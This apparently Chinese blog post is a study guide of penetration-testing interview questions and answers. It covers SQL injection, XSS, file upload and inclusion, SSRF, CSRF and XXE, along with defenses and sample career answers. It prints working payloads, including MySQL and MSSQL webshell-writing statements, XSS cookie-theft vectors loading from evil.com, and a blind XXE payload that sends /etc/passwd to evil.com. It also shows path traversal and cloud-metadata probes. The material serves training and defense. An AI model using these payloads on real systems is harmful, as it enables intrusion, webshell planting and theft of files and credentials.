2025年渗透测试面试题总结-59(题目+回答)

发布于:2025-09-09 ⋅ 阅读:(20) ⋅ 点赞:(0)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

一、SQL注入全解

二、XSS与文件漏洞

三、服务端漏洞专题

四、职业经验与能力评估

1、注入攻击原理是什么?如何找注入点?如何判断注入点?
2、注入分为几类及提交方式是什么
3、注入攻击一般所支持的类型有那些
4、mysql数据库帐号和密码存放在那个库和表里面
5、如何寻找网站物理路径
6、分别写出mysql及mssql数据库写入webshell的方法
7、请说出mysql5.0以下与5.0以上的区别
8、sql注入对服务器文件读写操作需要那些条件
9、分别说出sqlmap -u -r -v -p —level —risk —tables —coiumns -T —tamper参数的含义
10、注入漏洞防范方法
11、xss攻击原理及出现的原因
12、xss分为那几类
13、xss的危害,可能存在的地方
14、xss漏洞测试方法
15、xss如何绕过安全防范
16、分别说出iis、apache、nginx解析漏洞原理
17、任意文件下载攻击原理及测试方法
18、任意文件上传漏洞分几类,说出每类突破方法
19、分别文件包含漏洞攻击原理及分类
20、如何快速挖包涵漏洞
21、包涵漏洞具体能做什么,怎么绕过你能说说吗
22、ssrf漏洞攻击原理、用途
23、说说你是如何挖掘ssrf漏洞
24、说说ssrf绕过及防范方法
25、csrf攻击原理是什么及一般你用什么工具进行检测
26、你是如何挖掘ssrf漏洞的及防范方法
27、说说xxe漏洞攻击原理是什么,如何找xxe漏洞及攻击方法
28、xxe攻击在无回显的时候你是如何突破的
29、你是如何防范xxe漏洞的
30、你挖洞影像最深的是什么?
31、你认为你的渗透水平在国内大概是什么水平,能给自己打多少分
32、说说你以前在你公司主要做什么安全工作?如每天、每月、每年做些什么安全工作
33、你在各大漏洞平台挖过漏洞吗,能说说吗?
34、你写过什么好的安全漏洞文章发布过吗,是否可以说说?

一、SQL注入全解

1. 注入原理与检测mermaid

graph LR A[用户输入] --> B[拼接入SQL语句] --> C[数据库执行恶意指令] --> D[数据泄露/系统控制]
  • 找注入点:表单参数、URL参数、HTTP头(Cookie/User-Agent)
  • 判断方法
    • 单引号触发报错(' → 500错误)
    • 逻辑测试(id=1' and '1'='1 vs id=1' and '1'='2
    • 时间盲注(id=1; select sleep(5)--

2. 注入类型与提交方式

类型 提交方式 案例
联合查询注入 GET/POST参数 union select 1,@@version,3
报错注入 Cookie头 ' and updatexml(1,concat(0x7e,version()),1)--
布尔盲注 JSON Body admin' and substr(database(),1,1)='a'--
时间盲注 XML数据 if(ascii(substr(user(),1,1))=114,sleep(3),0)

3. 支持的数据类型

  • 整型(id=1)、字符串(name='admin')、搜索型(%input%)、JSON/XML

4. MySQL凭据存储位置

sql-- MySQL 5.7+ SELECT user,authentication_string FROM mysql.user; -- MySQL <5.7 SELECT user,password FROM mysql.user; 

5. 网站物理路径获取

  • 报错信息(PHP错误日志)
  • 文件读取漏洞(/proc/self/environ
  • 数据库函数(@@datadir
  • 配置文件泄露(WEB-INF/web.xml

6. 数据库写Webshell方法

sql/* MySQL(需FILE权限)*/ SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/shell.php'; /* MSSQL(需db_owner权限)*/ EXEC sp_makewebtask 'C:\inetpub\shell.asp', '<?% execute(request("cmd")) %>';

7. MySQL 5.0关键区别

特性 5.0以下 5.0以上
系统表 无information_schema 内置元数据表
盲注效率 依赖暴力猜解 可直接查询表结构
函数支持 受限 丰富(如group_concat)

8. 文件读写条件

  • 数据库配置
    • MySQL:secure_file_priv=空值
    • MSSQL:启用xp_cmdshell
  • 权限:数据库用户需具备FILE权限(MySQL)或db_owner(MSSQL)
  • 路径:绝对路径且Web目录可写

9. SQLMap核心参数

bash-u "url" # 目标URL -r request.txt # 从文件加载HTTP请求 -v 3 # 显示完整payload(0-6级别) -p "id" # 指定测试参数 --level 2 # 检测深度(1-5,影响Cookie/XFF检测) --risk 3 # 风险等级(1-3,3会触发OR注入) --tables # 列出所有表 --columns -T users # 列出指定表字段 --tamper "space2comment" # 绕过WAF的脚本

10. 注入防御方案

  • 参数化查询(PreparedStatement)
  • 输入过滤(正则匹配:/[^a-z0-9]/i
  • 最小权限原则(禁用DB_FILE权限)
  • WAF规则(过滤union|select|sleep

二、XSS与文件漏洞

11. XSS原理与成因

mermaidgraph LR 用户输入 --> 未过滤插入页面 --> 浏览器执行JS代码 --> 劫持会话/钓鱼 
  • 根本原因:未对<>'"&等字符转义

12. XSS分类

类型 触发场景 案例
反射型 URL参数直接输出 http://site?search=<script>alert(1)</script>
存储型 数据库存储后渲染 留言板插入恶意脚本
DOM型 前端JS操作DOM document.write(location.hash)

13. XSS危害与常见位置

  • 危害:Cookie窃取、键盘记录、钓鱼跳转、内网探测
  • 高发点:搜索框、评论区、用户资料页、HTTP头输出点

14. 测试方法

  • 基础探测:<script>alert(1)</script>
  • 事件触发:<img src=x onerror=alert(document.cookie)>
  • 外部加载:<script src=//evil.com/xss.js></script>

15. 绕过技巧

  • Unicode编码:\u003cscript\u003e
  • 标签属性分割:<img """><script>alert(1)</script>
  • 利用协议:javascript:eval(alert(1))
  • SVG向量:<svg onload=alert(1)>

16. 服务器解析漏洞

服务器 漏洞原理 利用方式
IIS 6.0 分号截断(*.asp;.jpg 上传恶意图片马
Apache 多后缀解析(file.php.jpg 配置错误导致双后缀
Nginx CVE-2013-4547(a.jpg\0.php 空字节截断

17. 任意文件下载

  • 原理:未校验文件路径参数(如download.jsp?file=../../etc/passwd
  • 测试
    1. 遍历路径(....//编码绕过)
    2. 读取系统文件(/proc/self/cmdline

18. 文件上传突破方法

防御方式 绕过技巧
扩展名黑名单 .php5 .phtml .htaccess
MIME类型检测 修改Content-Type为image/jpeg
文件头检查 添加GIF头(GIF89a;
内容过滤 短标签(<?=)或JS混淆

19. 文件包含漏洞

  • 原理include($_GET['file']); 未限制路径
  • 分类
    • LFI(本地包含):包含系统文件
    • RFI(远程包含):加载远程恶意脚本(需allow_url_include=On

20. 快速挖掘技巧

  • 参数特征:?page=about.php
  • 日志包含:file=/var/log/apache2/access.log
  • PHP伪协议:php://filter/convert.base64-encode/resource=index.php

21. 包含漏洞利用与绕过

  • 能做什么
    • 读取源码(php://filter
    • 执行代码(包含图片马)
    • 日志污染(User-Agent插入PHP代码)
  • 绕过
    • 路径截断(/etc/passwd%00
    • 超长路径(./././[...]/file

三、服务端漏洞专题

22. SSRF原理与用途

mermaidgraph TB 攻击者 --> 诱使服务器请求内网资源 --> 探测内网拓扑 --> 攻击Redis/数据库
  • 用途
    • 内网端口扫描(http://192.168.1.1:3306
    • 云元数据窃取(169.254.169.254
    • 攻击内网应用(Redis未授权访问)

23. 漏洞挖掘方法

  • 参数特征:url=http://example.com
  • 协议探测:file:///etc/passwd gopher://
  • 重定向链:短链接→内网IP

24. SSRF绕过与防御

  • 绕过
    • 域名重绑定(DNS TTL=0)
    • IPv6地址([::ffff:127.0.0.1]
    • URL编码(0x7f000001 = 127.0.0.1)
  • 防御
    • 禁用非常用协议(file/gopher)
    • 设置请求白名单

25. CSRF原理与工具

  • 原理:诱导用户点击恶意链接触发敏感操作(如修改密码)
  • 工具
    • Burp Suite → Generate CSRF PoC
    • CSRFTester(自动化检测)

26. CSRF防御

  • Token验证:表单添加随机Token
  • SameSite Cookie:设置StrictLax
  • 二次验证:关键操作需密码确认

27. XXE漏洞攻防

  • 原理:解析恶意XML实体(<!ENTITY xxe SYSTEM "file:///etc/passwd">
  • 检测
    • 修改Content-Type为application/xml
    • 插入测试实体(&xxe;
  • 攻击
    • 文件读取(SYSTEM "file://"
    • 内网探测(http://192.168.1.1

28. 无回显XXE突破

xml<!ENTITY % payload SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % int "<!ENTITY % trick SYSTEM 'http://evil.com/?data=%payload;'>"> 
  • 通过DNS或HTTP请求外带数据

29. XXE防御

  • 禁用DTD(libxml_disable_entity_loader(true);
  • 使用JSON替代XML
  • 过滤<!ENTITY关键词

四、职业经验与能力评估

30. 印象最深漏洞案例

某银行系统逻辑漏洞:转账接口未校验双方账户关系,通过遍历参数实现任意账户互转,漏洞评级严重(SRC TOP10)

31. 渗透水平自评

国内中高级水平(75/100)

  • 优势:熟练掌握漏洞链组合利用(如SSRF→Redis→RCE)
  • 不足:二进制漏洞挖掘能力待提升

32. 日常工作内容

周期 工作重点
每日 漏洞扫描、日志审计、应急响应
每月 渗透测试报告、安全加固方案
每年 红蓝对抗演练、安全架构升级

33. 漏洞平台经历

  • 提交平台:补天、HackerOne、企业SRC
  • 成果:累计提交高危漏洞32个(含3个严重级)

34. 技术文章输出

《基于流量特征的WAF绕过实战》

  • 发布平台:FreeBuf、安全客
  • 核心内容:
    1. 分块传输绕过
    2. 注释符混淆SQL语句
    3. HTTP参数污染技巧

网站公告

今日签到

点亮在社区的每一天
去签到